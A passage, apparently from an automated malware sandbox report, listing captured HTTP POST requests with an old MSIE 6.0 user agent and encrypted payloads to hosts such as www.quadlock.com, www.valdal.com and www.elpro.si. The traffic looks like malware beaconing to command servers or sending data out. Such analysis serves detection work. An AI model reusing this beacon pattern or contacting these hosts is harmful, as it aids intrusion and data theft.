4a 79 46 4c 66 2f 49 69 4c 68 6c 50 69 56 32 78 39 42 41 73 70 37 45 75 4d 59 71 59 6d 52 34 55 4c 39 6d 68 4a 59 44 78 65 78 51 61 77 3d 3d Data Ascii: S6OD2mkWR4sRmnB+OOw50oKyQxsHdP7TrWcW/Kq3ns4DhyJRYjr9kFp21BW/+0fJxfBmaGuXm4mTe/k3YLlKgw5OEPVujdQ0wpmb8QxSkQHtN4rvmMZgYMXwTIcrnLO6U7azfH9u5QEMbWFAK80P+YD756YXo7M3At/pPGgI6J+BWAVtgv1Spxp5Hr3v9hT9ugtrsyAMwMwYjcSwpjnQ5D6942bVQY1sqlKSYGlvVOBJLAA4gICHqjF0bq3EI7XhrFr53oV5Jv25wrwEwTuinE8QMMBr04IeyF8HNvM/KlMkPxQZGshhDgkFDlncY8mwCVg/yWth9mMbbQeUqhBhm9DXN2BsmAd6v8UEuDIyY80we+MaxBMBv8NQcdzZLHwjRR/BH6CboGJLTHIdhR/wfxgs+w6OKkH3Ui/cGP1P616OOwOzziHK15N8CwL8yfx6q2W6N9mWC70aGXHY6VxbbzqR8D8SBRWORUI1rPmUs+glQ7vlVRcACuSLbX8PDATrFT5oX0p+kq6CwJyFLf/IiLhlPiV2x9BAsp7EuMYqYmR4UL9mhJYDxexQaw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 36 6c 35 71 4b 71 61 75 53 59 76 4c 4a 53 4a 6a 51 66 58 34 75 4d 6b 65 43 4e 53 47 63 64 67 4c 4f 71 33 44 62 67 73 44 68 50 44 75 35 37 30 38 4c 50 48 47 42 35 36 4c 72 42 34 6a 7a 57 6f 38 6a 59 6b 68 51 71 7a 44 54 41 62 66 39 4a 69 67 42 67 55 5a 7a 52 45 4e 6a 4f 39 68 77 57 33 66 6a 52 30 49 6d 6f 46 54 73 4a 6e 4e 49 38 4d 37 31 57 55 61 4d 34 64 48 53 4e 70 70 46 65 73 33 44 6a 42 2f 78 39 69 77 6c 5a 38 6b 77 30 44 56 44 66 6a 4d 4a 4d 53 66 51 57 31 58 68 4b 6a 39 79 4b 43 6a 70 58 44 48 49 45 37 35 74 78 6d 55 71 6e 63 36 78 39 2f 58 33 48 66 78 39 43 48 49 79 61 37 65 68 4f 32 64 52 55 6b 6b 74 6c 2b 2b 6d 2f 7a 41 6a 41 6b 46 54 6f 53 6e 4d 59 6f 36 30 58 45 68 47 73 4b 68 53 5a 66 2b 74 52 37 35 55 52 6c 44 64 48 45 72 35 4e 4c 34 47 6f 6d 46 42 4b 4e 56 48 52 6a 35 32 56 76 53 6f 49 75 41 41 4d 53 36 75 34 39 4b 39 36 66 58 6f 57 4e 2b 35 55 5a 52 59 49 65 6a 73 4c 36 37 41 67 50 76 57 38 55 62 63 56 50 55 73 37 43 2f 39 55 43 6f 33 78 6b 30 39 62 61 4a 72 4c 44 56 65 39 66 53 47 46 76 77 48 63 52 65 36 2b 6e 78 67 62 39 4e 36 63 5a 6e 74 55 77 42 35 62 78 68 54 45 35 41 2f 50 53 41 54 4d 79 6c 4c 4a 47 6b 78 32 52 37 50 5a 47 39 63 33 42 2b 37 63 6f 4a 37 66 4c 70 34 6b 51 57 75 74 6f 2b 2b 6c 4e 6e 75 6a 2f 47 33 32 32 4a 6d 36 32 2b 47 57 47 5a 6a 54 51 5a 39 32 53 69 69 6d 6e 62 45 42 6a 42 54 32 69 4c 4f 42 7a 72 5a 31 49 4d 6f 36 30 39 2b 6a 4b 6f 38 30 32 48 4d 52 62 6d 51 67 78 36 4f 43 54 6a 50 6a 4c 52 52 42 67 31 46 4a 34 79 64 57 42 6e 65 6b 42 6c 74 6a 63 31 62 72 51 61 51 6c 6b 61 76 62 78 57 6e 73 42 6c 49 62 4c 56 77 46 68 71 4d 31 5a 67 73 77 3d 3d Data Ascii: 6l5qKqauSYvLJSJjQfX4uMkeCNSGcdgLOq3DbgsDhPDu5708LPHGB56LrB4jzWo8jYkhQqzDTAbf9JigBgUZzRENjO9hwW3fjR0ImoFTsJnNI8M71WUaM4dHSNppFes3DjB/x9iwlZ8kw0DVDfjMJMSfQW1XhKj9yKCjpXDHIE75txmUqnc6x9/X3Hfx9CHIya7ehO2dRUkktl++m/zAjAkFToSnMYo60XEhGsKhSZf+tR75URlDdHEr5NL4GomFBKNVHRj52VvSoIuAAMS6u49K96fXoWN+5UZRYIejsL67AgPvW8UbcVPUs7C/9UCo3xk09baJrLDVe9fSGFvwHcRe6+nxgb9N6cZntUwB5bxhTE5A/PSATMylLJGkx2R7PZG9c3B+7coJ7fLp4kQWuto++lNnuj/G322Jm62+GWGZjTQZ92SiimnbEBjBT2iLOBzrZ1IMo609+jKo802HMRbmQgx6OCTjPjLRRBg1FJ4ydWBnekBltjc1brQaQlkavbxWnsBlIbLVwFhqM1Zgsw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.rs-ag.comCache-Control: no-cacheData Raw: 73 4e 6d 38 63 35 77 79 6e 34 76 68 5a 39 58 57 78 36 33 71 73 69 2b 67 75 4c 2b 30 36 2b 74 66 6b 47 57 4c 7a 71 6d 2b 4f 43 42 4c 6b 2f 72 52 61 2b 72 44 6c 49 61 65 4f 34 79 66 66 55 76 55 75 53 5a 64 36 4c 49 49 6d 45 6f 62 58 39 58 6f 47 51 43 47 4c 73 76 4a 38 65 4b 35 42 50 48 77 2f 58 41 48 30 75 45 6e 65 41 4f 50 44 38 52 4a 41 59 36 66 48 46 61 49 48 4e 6f 57 55 34 58 48 52 70 34 50 56 50 31 41 72 56 58 53 41 4b 70 4d 63 53 31 39 77 6c 6e 33 7a 37 52 37 4b 62 43 79 34 35 57 6d 61 61 68 75 77 54 57 6b 37 53 5a 68 74 42 55 31 70 30 50 48 58 66 39 64 4b 76 44 4c 64 6f 36 78 58 5a 45 35 63 75 57 4a 67 39 4e 5a 6c 46 76 38 34 33 36 4c 78 7a 50 39 50 76 31 42 4d 6c 32 67 64 69 35 34 41 31 4a 36 67 64 49 45 67 5a 6b 69 75 52 4a 4b 68 63 63 69 55 45 64 70 73 38 6b 72 31 51 52 74 78 64 32 6a 6b 52 75 52 69 44 43 4a 48 41 4c 78 74 6f 52 58 45 46 37 49 4d 30 6a 42 63 54 54 56 54 6d 6b 64 72 31 67 6f 2b 48 61 75 74 4d 30 69 34 37 55 6a 65 57 36 66 44 75 77 72 75 37 65 62 49 44 77 7a 5a 53 5a 33 54 76 41 49 62 70 4a 39 4f 7a 4e 34 71 4a 44 71 55 52 33 4d 79 48 65 4a 5a 59 4b 50 5a 55 50 39 4c 61 39 39 43 35 44 78 6a 47 50 38 31 6f 4e 37 38 58 66 61 66 75 61 57 4c 4d 41 7a 78 79 51 77 61 44 7a 58 4e 34 2b 4b 47 34 46 30 30 76 48 78 59 6a 47 61 36 6b 65 7a 48 6f 68 2b 5a 78 69 52 75 31 59 53 6a 4d 78 78 78 56 58 55 32 49 36 6f 32 58 6b 57 71 32 44 49 7a 52 73 4e 4c 4b 63 4a 79 72 5a 59 51 39 59 5a 79 64 49 58 39 62 59 34 4f 7a 58 77 69 63 61 6c 76 68 55 71 77 6c 68 63 41 58 6f 46 4c 44 79 30 30 57 30 64 64 43 64 6f 4c 52 37 4d 50 30 69 77 6c 78 51 42 6f 6d 72 6f Data Ascii: sNm8c5wyn4vhZ9XWx63qsi+guL+06+tfkGWLzqm+OCBLk/rRa+rDlIaeO4yffUvUuSZd6LIImEobX9XoGQCGLsvJ8eK5BPHw/XAH0uEneAOPD8RJAY6fHFaIHNoWU4XHRp4PVP1ArVXSAKpMcS19wln3z7R7KbCy45WmaahuwTWk7SZhtBU1p0PHXf9dKvDLdo6xXZE5cuWJg9NZlFv8436LxzP9Pv1BMl2gdi54A1J6gdIEgZkiuRJKhcciUEdps8kr1QRtxd2jkRuRiDCJHALxtoRXEF7IM0jBcTTVTmkdr1go+HautM0i47UjeW6fDuwru7ebIDwzZSZ3TvAIbpJ9OzN4qJDqUR3MyHeJZYKPZUP9La99C5DxjGP81oN78XfafuaWLMAzxyQwaDzXN4+KG4F00vHxYjGa6kezHoh+ZxiRu1YSjMxxxVXU2I6o2XkWq2DIzRsNLKcJyrZYQ9YZydIX9bY4OzXwicalvhUqwlhcAXoFLDy00W0ddCdoLR7MP0iwlxQBomro
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valdal.comCache-Control: no-cacheData Raw: 56 6b 53 62 49 51 6e 59 70 49 76 48 47 32 64 4b 57 49 48 43 47 69 49 42 76 73 55 6e 5a 73 42 4b 54 57 75 49 37 31 58 56 66 71 61 62 6f 46 59 47 79 6b 51 50 6a 69 2f 72 38 74 74 52 52 35 56 61 45 52 49 46 4a 75 33 2b 39 6e 6b 4f 79 37 63 79 63 30 32 2f 36 50 6a 2b 59 42 57 5a 4f 74 49 39 71 33 35 37 38 6e 38 73 67 4f 56 77 73 69 55 4b 47 42 38 75 6b 7a 7a 73 7a 44 7a 30 36 50 7a 71 44 59 41 72 31 46 65 75 67 52 79 6e 4b 79 6c 2f 67 51 46 4f 6d 32 68 36 58 53 36 46 37 6d 62 33 51 6f 4d 58 34 49 34 6d 49 32 59 37 56 77 70 5a 42 6f 4d 30 5a 68 39 4d 57 71 38 59 63 6c 70 45 49 51 67 72 75 55 2b 55 44 69 55 78 39 31 47 53 70 49 72 49 74 72 56 4e 65 52 43 54 75 53 58 64 58 4c 66 49 70 72 6c 6c 6c 66 47 4f 6e 46 67 6a 66 4f 39 46 77 6b 44 68 4e 6f 78 4e 51 73 5a 54 72 32 58 74 37 71 4a 6d 50 55 74 49 4a 37 43 67 64 56 61 55 53 71 45 2f 35 76 51 37 73 4a 64 62 69 47 2b 57 35 36 33 70 34 37 66 52 32 76 57 4a 7a 61 39 76 73 65 7a 54 52 66 4b 48 5a 2b 6f 2f 69 56 74 36 70 6a 38 4e 58 34 57 38 70 4b 71 58 79 53 63 35 56 53 78 62 32 67 68 67 6e 56 4c 39 38 6d 49 4f 51 56 6d 42 68 57 43 76 66 61 69 5a 38 4e 78 31 46 62 34 30 6e 32 5a 35 63 63 57 32 66 59 75 2f 52 49 51 65 41 5a 77 57 77 30 4f 41 44 63 4a 52 67 78 47 2f 63 61 36 77 35 2f 48 72 75 65 6d 46 5a 41 6e 63 73 72 4b 37 34 43 32 36 77 2f 4c 43 69 4f 4e 79 72 31 6b 41 70 4d 61 57 35 52 42 61 6c 33 4b 57 50 79 71 64 43 36 73 62 42 52 39 71 49 74 35 4d 41 65 43 73 5a 48 58 2b 59 31 76 55 36 48 4a 6a 67 6b 6d 68 6c 50 5a 41 62 41 4d 70 35 79 69 61 68 76 53 41 43 71 35 6b 71 41 33 52 30 63 36 6d 74 4a 50 77 61 6c 2b 65 2f 55 50 74 50 62 7a 31 4d 62 35 62 33 61 42 65 62 31 65 43 63 6f 4f 61 61 70 2f 79 61 57 4c 66 4e 6c 69 71 4f 42 4d 69 41 2b 76 50 50 66 6d 67 Data Ascii: VkSbIQnYpIvHG2dKWIHCGiIBvsUnZsBKTWuI71XVfqaboFYGykQPji/r8ttRR5VaERIFJu3+9nkOy7cyc02/6Pj+YBWZOtI9q3578n8sgOVwsiUKGB8ukzzszDz06PzqDYAr1FeugRynKyl/gQFOm2h6XS6F7mb3QoMX4I4mI2Y7VwpZBoM0Zh9MWq8YclpEIQgruU+UDiUx91GSpIrItrVNeRCTuSXdXLfIprlllfGOnFgjfO9FwkDhNoxNQsZTr2Xt7qJmPUtIJ7CgdVaUSqE/5vQ7sJdbiG+W563p47fR2vWJza9vsezTRfKHZ+o/iVt6pj8NX4W8pKqXySc5VSxb2ghgnVL98mIOQVmBhWCvfaiZ8Nx1Fb40n2Z5ccW2fYu/RIQeAZwWw0OADcJRgxG/ca6w5/HruemFZAncsrK74C26w/LCiONyr1kApMaW5RBal3KWPyqdC6sbBR9qIt5MAeCsZHX+Y1vU6HJjgkmhlPZAbAMp5yiahvSACq5kqA3R0c6mtJPwal+e/UPtPbz1Mb5b3aBeb1eCcoOaap/yaWLfNliqOBMiA+vPPfmg
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.alteor.clCache-Control: no-cacheData Raw: 66 49 42 49 59 6e 36 68 6e 6f 73 45 59 66 32 71 53 56 6f 6a 54 57 45 50 6f 68 6f 2b 69 56 31 32 6b 74 6b 5a 70 69 33 6a 2f 4f 62 48 37 42 6c 74 51 53 6d 6c 43 7a 47 39 5a 61 34 75 50 69 4d 46 30 49 4c 39 63 70 31 73 49 33 36 37 6e 4f 5a 52 70 6c 37 54 2f 2f 44 66 59 4d 73 65 4d 47 49 2b 4a 4a 35 6f 46 41 57 69 34 73 6a 61 79 56 30 74 50 6b 34 73 56 4f 71 67 6c 39 5a 61 4c 4e 75 4d 37 58 62 72 41 4e 48 47 67 4c 55 5a 77 78 6e 6a 58 6c 51 5a 4a 42 6c 65 4f 53 45 2f 57 38 50 30 69 68 34 6b 39 46 61 35 69 46 73 45 4e 42 55 54 37 6e 65 58 6a 55 47 54 37 74 43 44 4c 59 46 72 36 46 68 46 32 65 67 2f 63 62 48 75 37 4d 59 74 77 70 2f 42 4c 49 57 7a 62 66 50 32 45 51 56 49 54 6e 42 45 67 2f 53 62 48 6e 67 53 49 53 32 72 58 69 62 42 34 4c 42 61 36 53 56 61 32 68 58 64 31 36 2f 45 6f 52 70 5a 74 46 30 52 6d 71 4c 62 47 79 71 55 33 65 4c 43 57 57 71 44 2b 67 77 6b 54 58 59 49 63 34 43 49 56 74 4d 76 6e 6d 59 43 58 49 44 5a 33 57 72 6c 4d 43 47 2f 48 67 43 4c 7a 48 54 59 75 64 4c 38 70 62 50 79 38 58 43 32 41 31 57 6e 56 73 47 65 43 78 6c 39 30 4a 51 69 56 37 58 4a 34 51 45 57 39 7a 4e 47 66 6c 73 4f 45 30 39 43 42 76 74 71 4c 30 77 69 57 2b 33 62 43 66 4a 70 78 32 62 76 7a 75 6b 53 7a 57 55 47 37 42 41 63 6c 33 48 69 73 61 52 72 42 67 72 51 30 56 39 37 77 42 46 75 64 44 4e 43 4f 56 74 36 75 73 56 2b 70 64 49 4a 71 30 48 35 76 4a 63 42 54 4c 4c 75 48 33 59 77 7a 6c 4d 2f 68 59 4f 74 4f 32 42 51 4e 52 72 33 79 32 4f 7a 50 64 63 5a 4c 45 70 6c 4e 53 58 4c 5a 6a 45 75 2f 69 57 50 48 57 36 31 75 6b 77 67 6c 6b 68 63 38 57 54 46 48 58 4a 79 38 4f 72 65 61 73 6d 7a 6c 6c 38 4a Data Ascii: fIBIYn6hnosEYf2qSVojTWEPoho+iV12ktkZpi3j/ObH7BltQSmlCzG9Za4uPiMF0IL9cp1sI367nOZRpl7T//DfYMseMGI+JJ5oFAWi4sjayV0tPk4sVOqgl9ZaLNuM7XbrANHGgLUZwxnjXlQZJBleOSE/W8P0ih4k9Fa5iFsENBUT7neXjUGT7tCDLYFr6FhF2eg/cbHu7MYtwp/BLIWzbfP2EQVITnBEg/SbHngSIS2rXibB4LBa6SVa2hXd16/EoRpZtF0RmqLbGyqU3eLCWWqD+gwkTXYIc4CIVtMvnmYCXIDZ3WrlMCG/HgCLzHTYudL8pbPy8XC2A1WnVsGeCxl90JQiV7XJ4QEW9zNGflsOE09CBvtqL0wiW+3bCfJpx2bvzukSzWUG7BAcl3HisaRrBgrQ0V97wBFudDNCOVt6usV+pdIJq0H5vJcBTLLuH3YwzlM/hYOtO2BQNRr3y2OzPdcZLEplNSXLZjEu/iWPHW61ukwglkhc8WTFHXJy8Oreasmzll8J
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valdal.comCache-Control: no-cacheData Raw: 56 6b 53 62 49 51 6e 59 70 49 76 48 47 32 64 4b 57 49 48 43 47 69 49 42 76 73 55 6e 5a 73 42 4b 54 57 75 49 37 31 58 56 66 71 61 62 6f 46 59 47 79 6b 51 50 6a 69 2f 72 38 74 74 52 52 35 56 61 45 52 49 46 4a 75 33 2b 39 6e 6b 4f 79 37 63 79 63 30 32 2f 36 50 6a 2b 59 42 57 5a 4f 74 49 39 71 33 35 37 38 6e 38 73 67 4f 56 77 73 69 55 4b 47 42 38 75 6b 7a 7a 73 7a 44 7a 30 36 50 7a 71 44 59 41 72 31 46 65 75 67 52 79 6e 4b 79 6c 2f 67 51 46 4f 6d 32 68 36 58 53 36 46 37 6d 62 33 51 6f 4d 58 34 49 34 6d 49 32 59 37 56 77 70 5a 42 6f 4d 30 5a 68 39 4d 57 71 38 59 63 6c 70 45 49 51 67 72 75 55 2b 55 44 69 55 78 39 31 47 53 70 49 72 49 74 72 56 4e 65 52 43 54 75 53 58 64 58 4c 66 49 70 72 6c 6c 6c 66 47 4f 6e 46 67 6a 66 4f 39 46 77 6b 44 68 4e 6f 78 4e 51 73 5a 54 72 32 58 74 37 71 4a 6d 50 55 74 49 4a 37 43 67 64 56 61 55 53 71 45 2f 35 76 51 37 73 4a 64 62 69 47 2b 57 35 36 33 70 34 37 66 52 32 76 57 4a 7a 61 39 76 73 65 7a 54 52 66 4b 48 5a 2b 6f 2f 69 56 74 36 70 6a 38 4e 58 34 57 38 70 4b 71 58 79 53 63 35 56 53 78 62 32 67 68 67 6e 56 4c 39 38 6d 49 4f 51 56 6d 42 68 57 43 76 66 61 69 5a 38 4e 78 31 46 62 34 30 6e 32 5a 35 63 63 57 32 66 59 75 2f 52 49 51 65 41 5a 77 57 77 30 4f 41 44 63 4a 52 67 78 47 2f 63 61 36 77 35 2f 48 72 75 65 6d 46 5a 41 6e 63 73 72 4b 37 34 43 32 36 77 2f 4c 43 69 4f 4e 79 72 31 6b 41 70 4d 61 57 35 52 42 61 6c 33 4b 57 50 79 71 64 43 36 73 62 42 52 39 71 49 74 35 4d 41 65 43 73 5a 48 58 2b 59 31 76 55 36 48 4a 6a 67 6b 6d 68 6c 50 5a 41 62 41 4d 70 35 79 69 61 68 76 53 41 43 71 35 6b 71 41 33 52 30 63 36 6d 74 4a 50 77 61 6c 2b 65 2f 55 50 74 50 62 7a 31 4d 62 35 62 33 61 42 65 62 31 65 43 63 6f 4f 61 61 70 2f 79 61 57 4c 66 4e 6c 69 71 4f 42 4d 69 41 2b 76 50 50 66 6d 67 Data Ascii: VkSbIQnYpIvHG2dKWIHCGiIBvsUnZsBKTWuI71XVfqaboFYGykQPji/r8ttRR5VaERIFJu3+9nkOy7cyc02/6Pj+YBWZOtI9q3578n8sgOVwsiUKGB8ukzzszDz06PzqDYAr1FeugRynKyl/gQFOm2h6XS6F7mb3QoMX4I4mI2Y7VwpZBoM0Zh9MWq8YclpEIQgruU+UDiUx91GSpIrItrVNeRCTuSXdXLfIprlllfGOnFgjfO9FwkDhNoxNQsZTr2Xt7qJmPUtIJ7CgdVaUSqE/5vQ7sJdbiG+W563p47fR2vWJza9vsezTRfKHZ+o/iVt6pj8NX4W8pKqXySc5VSxb2ghgnVL98mIOQVmBhWCvfaiZ8Nx1Fb40n2Z5ccW2fYu/RIQeAZwWw0OADcJRgxG/ca6w5/HruemFZAncsrK74C26w/LCiONyr1kApMaW5RBal3KWPyqdC6sbBR9qIt5MAeCsZHX+Y1vU6HJjgkmhlPZAbAMp5yiahvSACq5kqA3R0c6mtJPwal+e/UPtPbz1Mb5b3aBeb1eCcoOaap/yaWLfNliqOBMiA+vPPfmg
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pdqhomes.comCache-Control: no-cacheData Raw: 53 36 4f 44 32 6d 6b 57 52 34 73 52 6d 6e 42 2b 4f 4f 77 35 30 6f 4b 79 51 78 73 48 64 50 37 54 72 57 63 57 2f 4b 71 33 6e 73 34 44 68 79 4a 52 59 6a 72 39 6b 46 70 32 31 42 57 2f 2b 30 66 4a 78 66 42 6d 61 47 75 58 6d 34 6d 54 65 2f 6b 33 59 4c 6c 4b 67 77 35 4f 45 50 56 75 6a 64 51 30 77 70 6d 62 38 51 78 53 6b 51 48 74 4e 34 72 76 6d 4d 5a 67 59 4d 58 77 54 49 63 72 6e 4c 4f 36 55 37 61 7a 66 48 39 75 35 51 45 4d 62 57 46 41 4b 38 30 50 2b 59 44 37 35 36 59 58 6f 37 4d 33 41 74 2f 70 50 47 67 49 36 4a 2b 42 57 41 56 74 67 76 31 53 70 78 70 35 48 72 33 76 39 68 54 39 75 67 74 72 73 79 41 4d 77 4d 77 59 6a 63 53 77 70 6a 6e 51 35 44 36 39 34 32 62 56 51 59 31 73 71 6c 4b 53 59 47 6c 76 56 4f 42 4a 4c 41 41 34 67 49 43 48 71 6a 46 30 62 71 33 45 49 37 58 68 72 46 72 35 33 6f 56 35 4a 76 32 35 77 72 77 45 77 54 75 69 6e 45 38 51 4d 4d 42 72 30 34 49 65 79 46 38 48 4e 76 4d 2f 4b 6c 4d 6b 50 78 51 5a 47 73 68 68 44 67 6b 46 44 6c 6e 63 59 38 6d 77 43 56 67 2f 79 57 74 68 39 6d 4d 62 62 51 65 55 71 68 42 68 6d 39 44 58 4e 32 42 73 6d 41 64 36 76 38 55 45 75 44 49 79 59 38 30 77 65 2b 4d 61 78 42 4d 42 76 38 4e 51 63 64 7a 5a 4c 48 77 6a 52 52 2f 42 48 36 43 62 6f 47 4a 4c 54 48 49 64 68 52 2f 77 66 78 67 73 2b 77 36 4f 4b 6b 48 33 55 69 2f 63 47 50 31 50 36 31 36 4f 4f 77 4f 7a 7a 69 48 4b 31 35 4e 38 43 77 4c 38 79 66 78 36 71 32 57 36 4e 39 6d 57 43 37 30 61 47 58 48 59 36 56 78 62 62 7a 71 52 38 44 38 53 42 52 57 4f 52 55 49 31 72 50 6d 55 73 2b 67 6c 51 37 76 6c 56 52 63 41 43 75 53 4c 62 58 38 50 44 41 54 72 46 54 35 6f 58 30 70 2b 6b 71 36 43 77 4a 79 46 4c 66 2f 49 69 4c 68 6c 50 69 56 32 78 39 42 41 73 70 37 45 75 4d 59 71 59 6d 52 34 55 4c 39 6d 68 4a 59 44 78 65 78 51 61 77 3d 3d Data Ascii: S6OD2mkWR4sRmnB+OOw50oKyQxsHdP7TrWcW/Kq3ns4DhyJRYjr9kFp21BW/+0fJxfBmaGuXm4mTe/k3YLlKgw5OEPVujdQ0wpmb8QxSkQHtN4rvmMZgYMXwTIcrnLO6U7azfH9u5QEMbWFAK80P+YD756YXo7M3At/pPGgI6J+BWAVtgv1Spxp5Hr3v9hT9ugtrsyAMwMwYjcSwpjnQ5D6942bVQY1sqlKSYGlvVOBJLAA4gICHqjF0bq3EI7XhrFr53oV5Jv25wrwEwTuinE8QMMBr04IeyF8HNvM/KlMkPxQZGshhDgkFDlncY8mwCVg/yWth9mMbbQeUqhBhm9DXN2BsmAd6v8UEuDIyY80we+MaxBMBv8NQcdzZLHwjRR/BH6CboGJLTHIdhR/wfxgs+w6OKkH3Ui/cGP1P616OOwOzziHK15N8CwL8yfx6q2W6N9mWC70aGXHY6VxbbzqR8D8SBRWORUI1rPmUs+glQ7vlVRcACuSLbX8PDATrFT5oX0p+kq6CwJyFLf/IiLhlPiV2x9BAsp7EuMYqYmR4UL9mhJYDxexQaw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.depalo.comCache-Control: no-cacheData Raw: 72 68 33 46 68 6b 78 78 73 49 76 34 6f 42 35 6f 74 2f 7a 30 73 56 39 47 49 6f 51 6b 69 4a 64 47 51 4c 63 52 4f 55 55 53 41 79 63 4b 35 59 2b 6a 70 68 2f 39 5a 46 63 67 62 73 35 59 4d 46 66 70 79 48 45 38 44 6f 79 62 67 5a 62 75 5a 78 4c 37 57 48 2b 55 6a 30 75 63 54 75 73 35 66 57 67 42 35 75 41 65 53 4f 59 4c 6b 4d 7a 52 51 70 72 69 37 4d 62 55 33 4e 31 41 6e 39 75 6c 39 75 66 6c 41 4b 55 70 56 4f 6a 39 47 7a 48 32 59 75 6b 68 4e 4f 75 67 34 78 76 73 56 32 72 78 33 66 70 32 32 2b 41 79 4b 73 6f 77 55 68 68 6a 39 39 53 6e 68 6d 6f 73 34 38 73 45 48 37 6c 68 46 30 77 36 6b 6b 68 74 44 56 4d 50 6c 59 76 4c 48 42 2f 71 69 6d 43 32 55 49 77 65 56 62 45 75 4d 59 68 45 70 4e 37 37 61 46 4a 51 63 6e 74 68 30 2f 32 78 61 4a 32 72 79 48 54 67 77 45 51 62 36 5a 54 47 79 41 73 65 45 31 78 65 46 75 57 6f 50 6a 38 66 6a 46 44 6e 69 73 6b 49 38 67 38 6f 6c 41 65 31 4b 39 31 34 4d 5a 75 4d 49 6e 50 4c 65 43 47 70 4f 56 61 4a 7a 58 37 70 76 5a 6c 67 38 36 49 51 36 49 4c 32 79 49 42 6e 2b 4c 2b 57 69 57 33 6c 44 4a 6f 69 62 2b 61 6e 54 35 2f 55 7a 58 4b 4d 6c 6a 4f 46 73 4e 52 72 7a 4c 34 58 78 67 4c 73 6d 74 68 42 58 46 32 41 66 78 4b 79 6c 43 65 6f 30 53 57 59 74 74 71 35 45 5a 51 75 70 47 65 70 66 74 4f 6a 77 47 61 36 34 45 79 2f 35 71 4a 63 2f 56 78 75 4a 39 75 6f 47 70 61 52 63 6d 6c 70 33 78 71 35 70 44 33 72 47 74 76 44 34 41 59 56 66 31 70 4c 6e 6f 4b 68 46 33 4b 72 65 36 56 53 76 6a 43 74 53 53 51 74 32 36 4f 43 5a 4d 57 67 75 47 72 35 44 6d 74 50 66 70 49 46 75 67 67 5a 50 42 4d 4c 2f 36 57 48 75 4f 54 69 63 67 35 70 4f 54 78 6d 4f 31 6d 77 45 76 45 59 36 66 65 47 76 69 6d 6a 6c 52 67 36 77 54 38 2f 38 2f 76 49 55 6d 72 35 65 47 5a 37 42 64 56 36 4b 47 47 65 47 2f 73 3d Data Ascii: rh3FhkxxsIv4oB5ot/z0sV9GIoQkiJdGQLcROUUSAycK5Y+jph/9ZFcgbs5YMFfpyHE8DoybgZbuZxL7WH+Uj0ucTus5fWgB5uAeSOYLkMzRQpri7MbU3N1An9ul9uflAKUpVOj9GzH2YukhNOug4xvsV2rx3fp22+AyKsowUhhj99Snhmos48sEH7lhF0w6kkhtDVMPlYvLHB/qimC2UIweVbEuMYhEpN77aFJQcnth0/2xaJ2ryHTgwEQb6ZTGyAseE1xeFuWoPj8fjFDniskI8g8olAe1K914MZuMInPLeCGpOVaJzX7pvZlg86IQ6IL2yIBn+L+WiW3lDJoib+anT5/UzXKMljOFsNRrzL4XxgLsmthBXF2AfxKylCeo0SWYttq5EZQupGepftOjwGa64Ey/5qJc/VxuJ9uoGpaRcmlp3xq5pD3rGtvD4AYVf1pLnoKhF3Kre6VSvjCtSSQt26OCZMWguGr5DmtPfpIFuggZPBML/6WHuOTicg5pOTxmO1mwEvEY6feGvimjlRg6wT8/8/vIUmr5eGZ7BdV6KGGeG/s=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.elpro.siCache-Control: no-cacheData Raw: 77 6b 32 51 6b 51 6e 4c 73 49 75 31 54 68 74 35 57 4e 67 76 6d 53 4a 73 39 55 41 6e 46 54 49 55 54 64 61 53 6d 58 4c 6a 79 50 70 52 73 55 35 4d 53 63 33 35 43 6c 39 6e 6c 64 44 37 41 39 4f 57 5a 6a 4f 50 72 64 4d 4c 4d 69 4b 2b 30 48 41 37 45 46 76 6b 62 4f 49 37 69 6b 7a 39 39 56 2f 75 5a 77 79 6a 69 2b 31 2b 77 63 4c 46 4a 34 72 61 44 67 39 36 64 33 52 36 30 79 6d 53 6f 5a 71 4c 2f 2b 79 39 2f 63 4a 46 54 65 30 2f 35 38 4e 39 58 2b 70 56 6d 49 76 42 47 65 2b 4c 5a 44 65 58 6d 62 41 66 54 36 62 37 34 38 45 78 61 50 57 43 6f 44 6b 51 75 79 54 75 62 61 64 45 36 44 57 66 49 45 2b 73 2b 56 76 6b 6b 46 7a 4c 6d 67 34 77 6c 38 52 66 6f 75 49 31 47 4f 43 78 2b 4a 72 38 55 50 57 6c 6d 57 75 65 44 69 45 35 2b 73 70 6d 45 34 44 39 51 52 4a 5a 69 49 49 4e 61 36 78 67 2f 6a 36 53 61 55 67 55 59 35 2b 6b 51 70 6c 56 7a 62 4d 5a 52 71 47 78 33 5a 38 48 41 66 44 51 75 71 6d 75 4a 34 66 52 37 44 34 33 72 4c 70 43 62 63 30 52 72 69 78 59 31 46 39 66 4e 66 4e 32 4f 6e 6d 4f 4e 7a 44 45 2b 73 74 70 6c 53 66 76 4a 54 77 69 72 68 5a 73 74 6a 